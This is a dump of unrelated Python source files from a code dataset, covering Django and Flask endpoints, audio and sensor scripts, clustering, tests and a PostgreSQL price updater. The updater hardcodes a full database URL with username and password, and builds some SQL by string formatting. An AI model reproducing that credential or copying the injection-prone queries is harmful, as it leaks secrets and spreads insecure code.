algo['description']['storageAddress']\n try:\n r = requests.get(url, headers={'Accept': 'application/json;version=0.0'}) # TODO pass cert\n except:\n raise Exception(f'Failed to fetch {url}')\n else:\n if r.status_code != 200:\n raise Exception(f'end to end node report {r.text}')\n\n try:\n computed_hash = self.compute_hash(r.content)\n except Exception:\n raise Exception('Failed to fetch description file')\n else:\n if computed_hash != algo['description']['hash']:\n msg = 'computed hash is not the same as the hosted file. 
Please investigate for default of synchronization, corruption, or hacked'\n raise Exception(msg)\n\n f = tempfile.TemporaryFile()\n f.write(r.content)\n\n # save/update objective in local db for later use\n instance, created = Algo.objects.update_or_create(pkhash=pk, validated=True)\n instance.description.save('description.md', f)\n except Exception as e:\n raise e\n else:\n return instance\n\n def retrieve(self, request, *args, **kwargs):\n lookup_url_kwarg = self.lookup_url_kwarg or self.lookup_field\n pk = self.kwargs[lookup_url_kwarg]\n\n if len(pk) != 64:\n return Response({'message': f'Wrong pk {pk}'}, status.HTTP_400_BAD_REQUEST)\n\n try:\n int(pk, 16) # test if pk is correct (hexadecimal)\n except:\n return Response({'message': f'Wrong pk {pk}'}, status.HTTP_400_BAD_REQUEST)\n else:\n # get instance from remote node\n error = None\n instance = None\n try:\n data = getObjectFromLedger(pk, self.ledger_query_call)\n except JsonException as e:\n return Response(e.msg, status=status.HTTP_400_BAD_REQUEST)\n except Http404:\n return Response(f'No element with key {pk}', status=status.HTTP_404_NOT_FOUND)\n else:\n try:\n # try to get it from local db to check if description exists\n instance = self.get_object()\n except Http404:\n try:\n instance = self.create_or_update_algo(data, pk)\n except Exception as e:\n error = e\n else:\n # check if instance has description\n if not instance.description:\n try:\n instance = self.create_or_update_algo(data, pk)\n except Exception as e:\n error = e\n finally:\n if error is not None:\n return Response(str(error), status=status.HTTP_400_BAD_REQUEST)\n\n # do not give access to local files address\n if instance is not None:\n serializer = self.get_serializer(instance, fields=('owner', 'pkhash', 'creation_date', 'last_modified'))\n data.update(serializer.data)\n else:\n data = {'message': 'Fail to get instance'}\n\n return Response(data, status=status.HTTP_200_OK)\n\n def list(self, request, *args, **kwargs):\n # can modify result by interrogating `request.version`\n\n data, st = queryLedger({\n 'args': '{\"Args\":[\"queryAlgos\"]}'\n })\n\n modelData = None\n\n # init list to return\n if data is None:\n data = []\n l = [data]\n\n if st == 200:\n\n # parse filters\n query_params = request.query_params.get('search', None)\n\n if query_params is not None:\n try:\n filters = get_filters(query_params)\n except Exception as exc:\n return Response(\n {'message': f'Malformed search filters {query_params}'},\n status=status.HTTP_400_BAD_REQUEST)\n else:\n # filtering, reinit l to empty array\n l = []\n for idx, filter in enumerate(filters):\n # init each list iteration to data\n l.append(data)\n for k, subfilters in filter.items():\n if k == 'algo': # filter by own key\n for key, val in subfilters.items():\n l[idx] = [x for x in l[idx] if x[key] in val]\n elif k == 'model': # select objectives used by outModel hash\n if not modelData:\n # TODO find a way to put this call in cache\n modelData, st = queryLedger({\n 'args': '{\"Args\":[\"queryTraintuples\"]}'\n })\n if st != status.HTTP_200_OK:\n return Response(modelData, status=st)\n if modelData is None:\n modelData = []\n\n for key, val in subfilters.items():\n filteredData = [x for x in modelData if x['outModel'] is not None and x['outModel'][key] in val]\n algoKeys = [x['algo']['hash'] for x in filteredData]\n l[idx] = [x for x in l[idx] if x['key'] in algoKeys]\n\n return Response(l, status=st)\n\n @action(detail=True)\n def file(self, request, *args, **kwargs):\n return self.manage_file('file')\n\n 
@action(detail=True)\n def description(self, request, *args, **kwargs):\n return self.manage_file('description')\n","sub_path":"substrabac/substrapp/views/algo.py","file_name":"algo.py","file_ext":"py","file_size_in_byte":9282,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"202650199","text":"import math\n\nimport const\nimport event\n\n\nclass RingModulator(object):\n\n def __init__(self, carrier, modulator, sidebands, ideal=True, diff=True):\n\n #: Note. Usually higher in pitch than *modulator*.\n self.carrier = carrier\n\n #: Note. Usually lower in pitch than *carrier*.\n self.modulator = modulator\n\n #: Integer. The number of sidebands to output.\n self.sidebands = sidebands\n\n #: Boolean. If False, output will include *carrier* and *modulator*.\n #: Default is True.\n self.ideal = ideal\n\n #: Boolean. If False, output will exclude difference tones. Default is\n #: True.\n self.diff = diff\n\n def __repr__(self):\n return \"%s %s %s %s %s\" % (self.carrier,\n self.modulator,\n self.sidebands,\n self.ideal,\n self.diff)\n\n # modulate\n # ------------------------------------------------------------------- #\n\n def modulate(self):\n \"\"\"\n Create a spectrum via ring modulation.\n\n :returns: Chord\n\n \"\"\"\n note_list = []\n i = 1\n # include carrier and modulator?\n if self.ideal is False:\n note_list.append(self.carrier)\n note_list.append(self.modulator)\n while i < self.sidebands + 1:\n carrier_freq = self.carrier.frequency()\n modulator_freq = self.modulator.frequency()\n # create upper sidebands\n freq = carrier_freq + (i * modulator_freq)\n n = event.Note(self._frequency_to_midi(freq),\n self.carrier.duration,\n self.carrier.intensity)\n note_list.append(n)\n # create lower sidebands\n if self.diff is True:\n freq = self._frequency_to_midi(carrier_freq -\n (i * modulator_freq))\n n = event.Note(self._frequency_to_midi(freq),\n self.carrier.duration,\n self.carrier.intensity)\n note_list.append(n)\n i += 1\n return event.Chord(note_list,\n self.carrier.duration,\n self.carrier.intensity)\n\n # convert\n # ------------------------------------------------------------------- #\n\n @staticmethod\n def _frequency_to_midi(frequency):\n \"\"\"\n Convert frequency to MIDI note number.\n\n :param frequency: frequency in hertz (Hz)\n :type frequency: float\n :returns: int -- MIDI note number\n\n \"\"\"\n frequency /= const.A4_HZ\n frequency = abs(frequency)\n midi = (math.log(frequency, 2) * const.PITCH_CLASS_COUNT) + \\\n const.A4_MIDI\n return int(round(midi))\n","sub_path":"casc/ring_modulator.py","file_name":"ring_modulator.py","file_ext":"py","file_size_in_byte":2895,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"95283558","text":"\n\nfrom xai.brain.wordbase.nouns._width import _WIDTH\n\n#calss header\nclass _WIDTHS(_WIDTH, ):\n\tdef __init__(self,): \n\t\t_WIDTH.__init__(self)\n\t\tself.name = \"WIDTHS\"\n\t\tself.specie = 'nouns'\n\t\tself.basic = \"width\"\n\t\tself.jsondata = {}\n","sub_path":"xai/brain/wordbase/nouns/_widths.py","file_name":"_widths.py","file_ext":"py","file_size_in_byte":231,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"144597206","text":"import sys\nimport k_means\nsys.path.append(\"..\")\n\nimport clusters as utils\n\ndistance_function = utils.pearson\nnum_clusters = 7\n\n\ndef kcluster_bisect(clusters, vectors, distance=utils.euclidean, k=4):\n if len(clusters) == k:\n return 
clusters\n\n max_sse = None\n cluster_index = None\n for i in range(len(clusters)): # Compute cluster with highest SSE\n cluster = clusters[i]\n score = 0\n\n centroid = k_means.get_centroid(cluster, vectors)\n\n for country in cluster:\n score += pow(distance(vectors[country], centroid), 2)\n\n if max_sse is None or score > max_sse:\n max_sse = score\n cluster_index = i\n\n original_indexes = [] # Save actual indexes of the chosen cluster relative to the original vectors\n for index in clusters[cluster_index]:\n original_indexes.append(index)\n\n new_clusters = utils.kcluster([vectors[index] for index in clusters.pop(cluster_index)], distance=distance, k=2)\n for cluster in new_clusters:\n for i in range(len(cluster)):\n cluster[i] = original_indexes[cluster[i]] # Convert back to original vector indexes\n\n return kcluster_bisect(clusters + new_clusters, vectors, distance=distance, k=k)\n\n\ndef main(input_f):\n (countries, vectors) = k_means.read_file(input_f)\n\n clusters = kcluster_bisect([list(range(len(vectors)))], vectors, distance=distance_function, k=num_clusters)\n proper_clusters = [] # Nonempty clusters\n for i in range(num_clusters):\n if len(clusters[i]) == 0:\n continue\n\n proper_clusters.append(clusters[i])\n print('cluster {}:'.format(i + 1))\n print([countries[r] for r in clusters[i]])\n\n print(\"SSE: \" + str(k_means.sse(proper_clusters, vectors)))\n\n\nif __name__ == \"__main__\":\n main(\"data/preprocessed.csv\")","sub_path":"lab/k_means_bisect.py","file_name":"k_means_bisect.py","file_ext":"py","file_size_in_byte":1826,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"611809803","text":"from datetime import date, datetime\n\nimport six\nfrom mock import patch\n\nfrom bravado_core.formatter import to_python\n\n\ndef test_none():\n spec = {'type': 'string', 'format': 'date'}\n assert to_python(spec, None) is None\n\n\ndef test_no_format_returns_value():\n spec = {'type': 'string'}\n assert 'boo' == to_python(spec, 'boo')\n\n\ndef test_date():\n spec = {'type': 'string', 'format': 'date'}\n assert date(2015, 4, 1) == to_python(spec, '2015-04-01')\n\n\ndef test_datetime():\n spec = {'type': 'string', 'format': 'date-time'}\n result = to_python(spec, '2015-03-22T13:19:54')\n assert datetime(2015, 3, 22, 13, 19, 54) == result\n\n\n@patch('bravado_core.formatter.warnings.warn')\ndef test_no_registered_format_returns_value_as_is(_):\n spec = {'type': 'foo', 'format': 'bar'}\n assert 'baz' == to_python(spec, 'baz')\n\n\n@patch('bravado_core.formatter.warnings.warn')\ndef test_no_registered_format_throws_warning(mock_warn):\n to_python({'type': 'foo', 'format': 'bar'}, 'baz')\n mock_warn.assert_called_once()\n\n\ndef test_int64_long():\n spec = {'type': 'integer', 'format': 'int64'}\n if six.PY3:\n result = to_python(spec, 999)\n assert 999 == result\n else:\n result = to_python(spec, long(999))\n assert long(999) == result\n\n\ndef test_int64_int():\n spec = {'type': 'integer', 'format': 'int64'}\n result = to_python(spec, 999)\n if six.PY3:\n assert 999 == result\n assert isinstance(result, int)\n else:\n assert long(999) == result\n assert isinstance(result, long)\n\n\ndef test_int32_long():\n if six.PY3: # test irrelevant in py3\n return\n spec = {'type': 'integer', 'format': 'int32'}\n result = to_python(spec, long(999))\n assert 999 == result\n assert isinstance(result, int)\n\n\ndef test_int32_int():\n spec = {'type': 'integer', 'format': 'int32'}\n result = to_python(spec, 999)\n assert 999 == result\n assert 
isinstance(result, int)\n\n\ndef test_float():\n spec = {'type': 'number', 'format': 'float'}\n result = to_python(spec, float(3.14))\n assert 3.14 == result\n assert isinstance(result, float)\n\n\ndef test_double():\n spec = {'type': 'number', 'format': 'double'}\n result = to_python(spec, float(3.14))\n assert 3.14 == result\n assert isinstance(result, float)\n\n\ndef test_byte():\n spec = {'type': 'string', 'format': 'byte'}\n result = to_python(spec, 'x')\n assert 'x' == result\n assert isinstance(result, str)\n","sub_path":"tests/formatter/to_python_test.py","file_name":"to_python_test.py","file_ext":"py","file_size_in_byte":2468,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"92545283","text":"import datetime\nimport json\n\nfrom flask import request\nfrom flask_restplus import Resource\n\nfrom app.main.dto.snapshot_dto import SnapshotDTO\nfrom app.main.service import snapshot_service as service\nfrom app.main.service.snapshot_service import SnapshotServiceResponse\n\napi = SnapshotDTO.api\n\n\n@api.route('')\nclass SnapshotsResource(Resource):\n ISO_FORMAT = '%Y-%m-%dT%H:%M:%S.%fZ'\n EXPECTED_PROPERTIES = {'posts', 'keywords'}\n MIN_CLASSES_REQUIRED = 2\n\n @api.response(SnapshotServiceResponse.AlreadyExists, 'Snapshot already exists.')\n @api.response(SnapshotServiceResponse.Created, 'Snapshot created successfully.')\n @api.doc('Register a snapshot')\n @api.expect(SnapshotDTO.snapshot, validate=True)\n def post(self):\n spans_from = datetime.datetime.strptime(request.json['from'], self.ISO_FORMAT)\n spans_to = datetime.datetime.strptime(request.json['to'], self.ISO_FORMAT)\n synonym = request.json['synonym']\n statistics = json.loads(request.json['statistics'])\n sentiment = request.json['sentiment']\n\n # Confirm that all required classes are provided\n if len(statistics) < self.MIN_CLASSES_REQUIRED:\n return dict(message='Invalid amount of classes specified.'), 400\n\n # Confirm that statistics for all classes are provided\n for stat_class in statistics:\n for expected in self.EXPECTED_PROPERTIES:\n if expected not in statistics[stat_class]:\n return dict(message=f'Expected property {expected} in class {stat_class}.'), 400\n\n return service.add_snapshot(sentiment, statistics, spans_from, spans_to, synonym)\n","sub_path":"app/main/controller/snapshot_controller.py","file_name":"snapshot_controller.py","file_ext":"py","file_size_in_byte":1658,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"319994170","text":"import argparse\nimport re\nimport time\nimport urllib.parse\nfrom pathlib import Path\nfrom typing import Optional, Union, cast\n\nfrom bs4 import BeautifulSoup, Doctype, Tag\n\n\ndef get_html_listing_soup(\n in_folder: Union[Path, str],\n page_title: Optional[str] = None,\n out_file: Optional[Union[Path, str]] = None,\n) -> BeautifulSoup:\n\n in_folder = Path(in_folder)\n\n soup = BeautifulSoup(\"\", \"html5lib\")\n cast(Tag, soup.find(\"html\"))[\"lang\"] = \"en\"\n\n soup.insert(0, Doctype(\"html\"))\n\n if page_title is None:\n page_title = in_folder.stem\n\n head = cast(Tag, soup.find(\"head\"))\n title = soup.new_tag(\"title\")\n title.string = page_title\n head.append(title)\n\n body = cast(Tag, soup.find(\"body\"))\n\n link: Tag = soup.new_tag(\"div\")\n body.append(link)\n link_a: Tag = soup.new_tag(\"a\")\n link.append(link_a)\n link_a[\n \"href\"\n ] = \"https://dts333.github.io/WSF-Demos/QM%20Course%20Materials/Problems+exercises/qm_problems.html\"\n 
link_a.string = \"Link to Problems and Exercises Page\"\n\n    ul: Tag = soup.new_tag(\"ul\")\n    body.append(ul)\n\n    now_sec = int(time.time())\n    inlined_suffix_regex = re.compile(r\"_inlined$\")\n\n    li: Tag\n    for demo_full_path in sorted(in_folder.glob(\"**/*.html\")):\n        if demo_full_path.is_dir() or demo_full_path.name == \"index.html\":\n            continue\n\n        li = soup.new_tag(\"li\")\n        ul.append(li)\n\n        demo_relative_path = urllib.parse.quote(\n            str(demo_full_path.relative_to(in_folder)), safe=\"/\"\n        )\n        a = soup.new_tag(\n            \"a\",\n            href=(f\"./{demo_relative_path}?t={now_sec}\"),\n        )\n\n        demo_name = inlined_suffix_regex.sub(\"\", demo_full_path.stem)\n        a.string = demo_name\n        li.append(a)\n\n    if out_file is None:\n        out_file = in_folder / \"index.html\"\n\n    _ = Path(out_file).write_text(str(soup))\n\n    return soup\n\n\nif __name__ == \"__main__\":\n    parser = argparse.ArgumentParser()\n    parser.add_argument(\"folder\")\n    parser.add_argument(\"--title\")\n    parser.add_argument(\"--out-file\")\n\n    args = parser.parse_args()\n    get_html_listing_soup(args.folder, args.title, args.out_file)\n","sub_path":"RB/src/create_demo_listing_html.py","file_name":"create_demo_listing_html.py","file_ext":"py","file_size_in_byte":2168,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"}
{"seq_id":"156151090","text":"from typing import List\n\n\nclass Solution:\n    def plusOne(self, digits: List[int]) -> List[int]:\n        r = 1\n        for i in range(-1, -len(digits)-1, -1):\n            if digits[i]+r >= 10:\n                r = 1\n                digits[i] = 0\n            else:\n                r = 0\n                digits[i] = digits[i]+1\n                break\n        if r>0:\n            digits.insert(0,r)\n        return digits","sub_path":"python3/Week 1/plus-one.py","file_name":"plus-one.py","file_ext":"py","file_size_in_byte":389,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"}
{"seq_id":"388498333","text":"#!/usr/bin/env python\nimport rospy\n#import csv\n#import numpy as np\nfrom robotiq_ft_sensor.msg import ft_sensor\nimport numpy as np\nimport time\nimport matplotlib.pyplot as plt\nimport datetime\n#import idealab_tools.data_exchange.csv as csv\n#from std_msgs.msg import Int32\n#from sensor_msgs.msg import Image\n\nFx = 0\nFy = 0\nFz = 0\nMx = 0\nMy = 0\nMz = 0\n\ndef callback(msg):\n    global Fx,Fy,Fz,Mx,My,Mz\n    Fx = msg.Fx\n    Fy = msg.Fy\n    Fz = msg.Fz\n    Mx = msg.Mx\n    My = msg.My\n    Mz = msg.Mz\n\n\nrospy.init_node('listener')\n# subscribe once; the callback keeps the module-level force/torque values current\nrospy.Subscriber(\"robotiq_ft_sensor\",ft_sensor,callback)\nft_data = np.zeros((500,6))\n\nfor index in range(500):\n    ft_data[index,0] = Fx\n    ft_data[index,1] = Fy\n    ft_data[index,2] = Fz\n    ft_data[index,3] = Mx\n    ft_data[index,4] = My\n    ft_data[index,5] = Mz\n    time.sleep(0.05)\n    print(ft_data[index,:])\n#    print(index)\n    \n#rospy.spin()\ntst = datetime.datetime.now().isoformat(\"-\").split(\".\")[0].replace(\":\",\"-\")\nfilename = \"ft_data_\"\nfilename = filename + tst\nfig, axs = plt.subplots(2, 1, constrained_layout=True)\naxs[0].set_title('Force')\naxs[1].set_title('Torque')\naxs[0].plot(ft_data[:,0:3])\naxs[0].legend(['Fx','Fy','Fz'])\naxs[1].plot(ft_data[:,3:6])\naxs[1].legend(['Mx','My','Mz'])\nplt.show(block=True)\nnp.savetxt(filename, np.c_[ft_data], delimiter = \",\")\nprint(\"finish collecting\")\n","sub_path":"scripts/ft_sensor_data.py","file_name":"ft_sensor_data.py","file_ext":"py","file_size_in_byte":1334,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"}
{"seq_id":"123928096","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Sun Jun 28 18:23:21 2020\r\n\r\n@author: 
vishal\r\n\"\"\"\r\n\r\n\r\nn=\"hello world\"\r\ncount=0\r\nfor i in n:\r\n if(i=='o'):\r\n count=count+1\r\n \r\nprint(count)","sub_path":"Module3_A3_Countletter'O'.py","file_name":"Module3_A3_Countletter'O'.py","file_ext":"py","file_size_in_byte":196,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"69516899","text":"import pyaudio\nimport numpy as np\n#import matplotlib.pyplot as pyplot\n\nimport peakdetect\nimport customfirwin_ as fir\nimport savgol_filter as sgf\n\n\n# Sound stream params\nCHUNK = 512 #1024 samples per buffer\nFORMAT = pyaudio.paInt16 # bytes per sample\nCHANNELS = 1 # number of channels for micro\nRATE = 8000 #1024 * 8 # Sampling frequency; 44100 Hz is default\n\npa = pyaudio.PyAudio()\n\nstream = pa.open(\n format=FORMAT,\n channels=CHANNELS,\n rate=RATE,\n input=True,\n output=False,\n frames_per_buffer=CHUNK#,\n #input_device_index=2\n)\n\nnyq = RATE//2\nts = 1/RATE # Ts is period\nM = 256 # number of taps in filter\nfc = 0.4756 # from 100 to 4096 bandpass\n\nham_lp = fir.build_filter(M, fc, window=fir.hamming)\nblack_lp = fir.build_filter(M, fc, window=fir.blackman)\nshift = (np.cos(2 * np.pi * 0.5 * np.arange(M + 1)))\nham_hp = ham_lp * shift\nblack_hp = black_lp * shift\n\n'''\n# Create matplotlib figure and axes\nfig, (ax, ax2) = pyplot.subplots(2, figsize=(15, 7))\n# variables for plotting\nx = np.arange(0, 2 * CHUNK, 2)\nx_fft = np.linspace(0, nyq, CHUNK)\n# create a line objects\nline, = ax.plot(x, np.random.rand(CHUNK), '-', lw=2) # **kwargs: '-' is solid line; lw is line width\nline_fft, = ax2.semilogx(x_fft, np.random.rand(CHUNK), '-', lw = 2)\n# basic formatting for the axes\nax.set_title('AUDIO WAVEFORM')\nax.set_xlabel('samples')\nax.set_ylabel('volume')\nax.set_ylim(-1.2, 1.2)\nax.set_xlim(0, 2 * CHUNK)\npyplot.setp(ax, xticks=[0, CHUNK, 2 * CHUNK],yticks=[-1,0,1]) # set properties\npyplot.setp(ax.set_yticklabels((\"-A\",\"\",\"A\")))\nax2.set_xlim(20, nyq)\n# show the plot\npyplot.show(block=False)\n'''\n\nwhile True:\n\n # Get binary data\n data = stream.read(CHUNK)\n data_int = np.frombuffer(data, dtype=np.int16) # Convert data from buffer to int\n data_np = [(i/(2**14)) for i in data_int] # 16 bits = 2^16; first bit for sign; 2^15/2: from -(2^14) to 2^14\n #data_np = lfilter(taps, 1.0, data_np) # filter is used\n #filter the signals\n f_ham = np.convolve(data_np, ham_hp)\n f_black = np.convolve(data_np, black_hp)\n\n #line.set_ydata(data_np)\n\n # FFT\n y_fft = np.fft.fft(data_np)\n y_fft_ = np.fft.fft(fir.hamming(len(f_black))[:-1]*(f_black))\n #print(len(y_fft_))\n gain_coeff = 1.55 # Gain for freqs values 1.5\n spec_data = np.abs(y_fft_[0:CHUNK] / CHUNK * 2)\n\n spec_data = sgf.savgolfilt(spec_data, 3, 5, 1)\n\n #spec_data_ = [0]*int(nyq)\n #for i in range(len(spec_data)):\n # spec_data_[int(i*nyq/CHUNK)] = spec_data[i]\n\n #print(np.amax(spec_data))\n\n # Freq curve smoothing\n #spec_data_smooth = savgol_filter(spec_data, 5, 2)\n # Peak detecting\n maxs, mins = peakdetect.peakdet(spec_data, 0.06)\n\n # Convert taps number in frequencies\n if (len(maxs) > 0):\n for i in range(len(maxs)):\n maxs[i][0] *= RATE/CHUNK*0.8\n #maxs[0:len(maxs)][0] *= RATE/CHUNK\n maxs = maxs[:len(maxs) // 2] # Get first part of vector\n\n print(list(maxs))\n #print(len(spec_data)*RATE/CHUNK)\n\n #line_fft.set_ydata(spec_data)\n\n #fig.canvas.draw()\n #fig.canvas.flush_events()\n\n #print(len(data_int))\n 
#print(list(data_int))\n","sub_path":"Microphone/Code/Python/sound_4.py","file_name":"sound_4.py","file_ext":"py","file_size_in_byte":3145,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"648987009","text":"#!/usr/bin/env python\n\nimport sys\nimport math\nimport ROOT\nfrom array import array\n\nROOT.gROOT.SetStyle(\"Plain\")\nROOT.gStyle.SetOptStat(0)\nROOT.gStyle.SetOptFit()\nROOT.gStyle.SetCanvasColor(0)\nROOT.gStyle.SetTitleFillColor(0)\nROOT.gStyle.SetTitleBorderSize(0)\nROOT.gStyle.SetFrameBorderMode(0)\nROOT.gStyle.SetMarkerStyle(20)\nROOT.gStyle.SetTitleX(0.5)\nROOT.gStyle.SetTitleAlign(23)\nROOT.gStyle.SetLineWidth(3)\nROOT.gStyle.SetLineColor(1)\nROOT.gStyle.SetTitleSize(0.03,\"t\")\n\ndef filldiff(up,down,mid):\n n = up.GetN()\n diffgraph = ROOT.TGraph(2*n)\n i = 0\n xup = ROOT.Double(-9.9)\n yup = ROOT.Double(-9.9)\n xlo = ROOT.Double(-9.9)\n ylo = ROOT.Double(-9.9)\n xmid = ROOT.Double(-9.9)\n ymid = ROOT.Double(-9.9)\n\n while i= 0:\n device = torch.device('cuda:%d' % args.gpu)\n else:\n device = torch.device('cpu')\n\n user_table_path = 's3://xhs.alpha/reddm/' + args.user_table + '/dtm=%s' % args.dsnodash\n user_features = pq.ParquetDataset(user_table_path, filesystem=s3).read().to_pandas()\n\n device_table_path = 's3://xhs.alpha/reddm/' + args.device_table + '/dtm=%s' % args.dsnodash\n device_features = pq.ParquetDataset(device_table_path, filesystem=s3).read().to_pandas()\n\n relation_table_path = 's3://xhs.alpha/reddm/' + args.relation_table + '/dtm=%s' % args.dsnodash\n relation_df = pq.ParquetDataset(relation_table_path, filesystem=s3).read().to_pandas()\n\n label_table_path = 's3://xhs.alpha/reddm/' + args.label_table + '/dtm=%s' % args.dsnodash\n labels = pq.ParquetDataset(label_table_path, filesystem=s3).read().to_pandas()\n\n # Build graph\n graph_builder = PandasGraphBuilder()\n graph_builder.add_entities(user_features, 'user_entity_id', 'user')\n graph_builder.add_entities(device_features, 'device_entity_id', 'device')\n graph_builder.add_binary_relations(relation_df, 'user_entity_id', 'device_entity_id', 'used')\n graph_builder.add_binary_relations(relation_df, 'device_entity_id', 'user_entity_id', 'used-by')\n\n g = graph_builder.build()\n # Create csr/coo/csc formats before launching sampling processes\n # This avoids creating certain formats in each data loader process, which saves momory and CPU.\n g.create_formats_()\n\n # construct subgraph for labeled computation probably save some memory of storing features\n # g = construct_computation_graph(g, n_layers, labels[label_entity_col_name].values, label_entity_type)\n\n # Assign features.\n user_features = user_features.sort_values(by='user_entity_id').values[:, 1:]\n device_features = device_features.sort_values(by='device_entity_id').values[:, 1:]\n labels = labels.values\n val_num, test_num = labels.shape[0] // 8, labels.shape[0] // 8\n n_classes = labels[:, 1].max() + 1\n num_user_feature = user_features.shape[1]\n num_device_feature = device_features.shape[1]\n\n # if args.use_label_subgraph:\n # idxs = np.arange(labels.shape[0])\n # np.random.shuffle(idxs)\n # train_idx, val_idx, test_idx = idxs[val_num + test_num:], idxs[:val_num], idxs[val_num:val_num + test_num]\n # g = dgl.node_subgraph(g, {args.label_entity: labels[:, 0], })\n # user_features = user_features[labels[:, 0]]\n # device_features = device_features[g.nodes['device'].data[dgl.NID]]\n # labels = torch.tensor(labels[:, 1], dtype=torch.int64, device=device)\n # else:\n 
np.random.shuffle(labels)\n train_idx, val_idx, test_idx = \\\n labels[val_num + test_num:, 0], labels[:val_num, 0], labels[val_num:val_num + test_num, 0]\n expand_labels = np.empty(user_features.shape[0], dtype=np.int64)\n expand_labels[labels[:, 0]] = labels[:, 1]\n labels = torch.tensor(expand_labels, device=device)\n #\n # user_features = F.pad(torch.tensor(user_features, device=device, dtype=torch.float32), (0, num_device_feature))\n # device_features = F.pad(torch.tensor(device_features, device=device, dtype=torch.float32), (num_user_feature, 0))\n user_features = torch.tensor(user_features, device=device, dtype=torch.float32)\n device_features = torch.tensor(device_features, device=device, dtype=torch.float32)\n\n entity_features = {'user': user_features, 'device': device_features}\n\n # g.edges['used'].data['weight'] = torch.ShortTensor(relation_df['relation_edge_weight'].values)\n # g.edges['used-by'].data['weight'] = torch.ShortTensor(relation_df['relation_edge_weight'].values)\n # del relation_df\n # gc.collect()\n\n # prepare for training\n\n data = train_idx, val_idx, test_idx, num_user_feature + num_device_feature, num_user_feature, num_device_feature, \\\n labels, n_classes, entity_features, g\n\n # Run 10 times\n test_accs = []\n for i in range(10):\n test_accs.append(train(args, device, data))\n print('Average test accuracy:', np.mean(test_accs), '±', np.std(test_accs))\n","sub_path":"node_classify.py","file_name":"node_classify.py","file_ext":"py","file_size_in_byte":6694,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"299467071","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Nov 22 23:11:08 2018\n\n@author: ASUS\n\"\"\"\n\nimport os\nfrom urllib import parse\nimport psycopg2 as ps\nfrom psycopg2.extras import execute_batch\nfrom datetime import datetime\nimport pandas as pd\n\nqueryLst=0\n\ndef connectToDatabase():\n url='postgres://bmmoobheozofxs:ac8ba0f76a53e13844126695d8bad3d6826d1e087773b87bef85cebc43664f30@ec2-54-225-196-122.compute-1.amazonaws.com:5432/d20apms1nhd8do'\n\n os.environ['DATABASE_URL'] = url\n \n parse.uses_netloc.append('postgres')\n url=parse.urlparse(os.environ['DATABASE_URL'])\n \n conn=ps.connect(\n database=url.path[1:],\n user=url.username,\n password=url.password,\n host=url.hostname,\n port=url.port\n )\n \n cur=conn.cursor()\n \n return cur, conn\n\ndef runquery(query, lst=True, connected=False, valList=(), connList={}):\n if connected:\n cur=connList['cur']\n conn=connList['conn']\n else:\n cur, conn=connectToDatabase()\n \n result=None\n try:\n if len(valList)==0:\n cur.execute(query)\n else:\n print(\"batch\")\n execute_batch(cur, query, valList)\n \n if lst:\n result=list(cur)\n else:\n result=['success']\n except ps.Error as e:\n result=['error']\n print(e)\n except ValueError as e:\n result=['error']\n print(e)\n except:\n result=['error']\n# print(ps.Error)\n \n print(result)\n \n if connected==False:\n cur.close()\n conn.commit()\n \n return result\n\ndef updateCompanyRows(lst, connList): \n lst.sort()\n \n #get current company names and new names to add\n query=\"SELECT name from PRICE\"\n names = [i[0] for i in runquery(query, connected=True, connList=connList)]\n names.sort()\n \n addList=[]\n \n for i in lst:\n try:\n names.remove(i)\n except:\n addList.append(i)\n \n print(addList)\n \n #get all column names\n query=\"SELECT column_name FROM information_schema.columns WHERE table_name = 'price'\"\n colNames=[i[0] for i in runquery(query, connected=True, 
connList=connList)]\n \n valList=\"\"\n count=0\n for i in addList:\n if count == 0:\n valList=\"('%s'%s %s)\"%(i, ((len(colNames)>1)* \", \"), str([0]*(len(colNames)-1))[1:-1])\n else:\n valList= valList +\", ('%s'%s %s)\"%(i, ((len(colNames)>1)* \", \"), str([0]*(len(colNames)-1))[1:-1])\n count += 1\n print(valList)\n \n print(valList)\n \n #create new row\n if len(addList)>0:\n query=\"INSERT INTO price(%s) VALUES %s\" % (str(colNames)[1:-1].replace(\"'\",\"\"), valList)\n print(query)\n result=runquery(query,lst=False, connected=True, connList=connList)\n else:\n result=[\"table already up to date.\"]\n \n return result\n\ndef createNewRow(connList):\n curDate=datetime.now()\n colName=\"date%s%s%s\"%(format(curDate.day, '02d'), format(curDate.month, '02d'), curDate.year)\n query=\"ALTER TABLE price ADD %s float\"%(colName)\n \n print(query)\n \n result=runquery(query, lst=False, connected=True, connList=connList)\n return result, colName\n\ndef updatePrice(df, connList, colName):\n global queryLst\n queryLst=()\n query=\"UPDATE price SET %s\"%(colName)+\"\"\" = %s WHERE name = %s\"\"\"\n# query=\"UPDATE price SET date9122018 = 110.0 WHERE name = 'test'\"\n print(query)\n try:\n for i in range(len(df.index)):\n queryLst+=((float(df.iloc[i,1]), df.iloc[i,0]),)\n except:\n print(df.iloc[i,0])\n print(i)\n# print(queryLst)\n result=runquery(query, lst=False, connected=True, valList=queryLst, connList=connList)\n# result=runquery(query, lst=False, connected=True, connList=connList)\n \n return result\n\ndef updateDB(df):\n cur, conn=connectToDatabase()\n conn.autocommit=True\n connList={\n 'cur': cur,\n 'conn': conn\n }\n try:\n comNames=list(df['name'])\n result=updateCompanyRows(comNames, connList)\n if result[0] =='error':\n return False, 'error updating / checking companies in DB'\n else:\n result, colName=createNewRow(connList)\n result2=updatePrice(df, connList, colName) \n except ValueError as e:\n 